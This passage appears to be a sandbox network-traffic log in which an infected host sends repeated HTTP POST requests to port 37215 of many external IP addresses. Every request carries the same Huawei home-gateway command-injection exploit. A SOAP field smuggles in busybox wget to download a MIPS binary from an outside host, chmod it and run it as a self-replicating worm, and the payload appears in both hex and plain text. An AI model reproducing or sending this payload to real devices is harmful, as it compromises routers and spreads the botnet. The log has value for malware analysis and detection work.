                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1017192.168.2.153324041.171.249.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.705936909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1018192.168.2.1535756197.28.92.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.706135035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1019192.168.2.1537308206.238.237.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.706342936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1020192.168.2.155854841.107.80.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.706408024 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1021192.168.2.153750241.85.67.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.706599951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1022192.168.2.1544000157.4.175.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730108023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1023192.168.2.1545810154.6.134.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730176926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1024192.168.2.153541070.229.98.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730209112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1025192.168.2.1541224150.2.59.5037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730233908 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1026192.168.2.153912841.189.7.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.730268955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
